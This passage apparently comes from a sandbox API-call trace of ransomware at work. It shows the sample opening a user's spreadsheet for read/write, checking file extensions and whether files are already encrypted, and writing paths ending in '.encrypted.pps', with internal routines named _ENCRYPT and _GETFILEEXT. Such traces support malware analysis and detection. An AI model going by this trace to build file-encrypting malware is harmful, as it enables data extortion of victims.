lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0033.876] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x123d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.876] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0033.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.encrypted.pps\r\n", cchWideChar=121, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 121 [0033.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x79) returned 0x7d5b30 [0033.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.encrypted.pps\r\n", cchWideChar=121, lpMultiByteStr=0x7d5b30, cbMultiByte=121, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.encrypted.pps\r\n", lpUsedDefaultChar=0x0) returned 121 [0033.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0033.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0033.876] WriteFile (in: hFile=0x140, lpBuffer=0x7d5c40*, nNumberOfBytesToWrite=0x78, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5c40*, lpNumberOfBytesWritten=0x6aee3c*=0x78, lpOverlapped=0x0) returned 1 [0033.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0033.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.877] CloseHandle (hObject=0x140) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75d0 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.878] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0033.878] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.879] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0033.879] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.879] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0033.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0033.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.879] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.879] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0033.880] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.880] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0033.880] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.880] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\ggg2vkusl20.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.880] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0033.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.881] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.881] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.881] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0033.881] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.881] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.882] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0033.882] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.882] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0033.882] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.882] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0033.882] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0033.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.882] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.882] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.882] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.882] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c03bc60, ftCreationTime.dwHighDateTime=0x1d5bcc0, ftLastAccessTime.dwLowDateTime=0xe68a5ae0, ftLastAccessTime.dwHighDateTime=0x1d5c1a1, ftLastWriteTime.dwLowDateTime=0xe68a5ae0, ftLastWriteTime.dwHighDateTime=0x1d5c1a1, nFileSizeHigh=0x0, nFileSizeLow=0x15bf2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="GGg2Vkusl20.xlsx", cAlternateFileName="GGG2VK~1.XLS")) returned 0x7c20c0 [0033.882] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.882] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.882] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c03bc60, ftCreationTime.dwHighDateTime=0x1d5bcc0, ftLastAccessTime.dwLowDateTime=0xe68a5ae0, ftLastAccessTime.dwHighDateTime=0x1d5c1a1, ftLastWriteTime.dwLowDateTime=0xe68a5ae0, ftLastWriteTime.dwHighDateTime=0x1d5c1a1, nFileSizeHigh=0x0, nFileSizeLow=0x15bf2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="GGg2Vkusl20.xlsx", cAlternateFileName="GGG2VK~1.XLS")) returned 0x7c20c0 [0033.883] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.883] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS 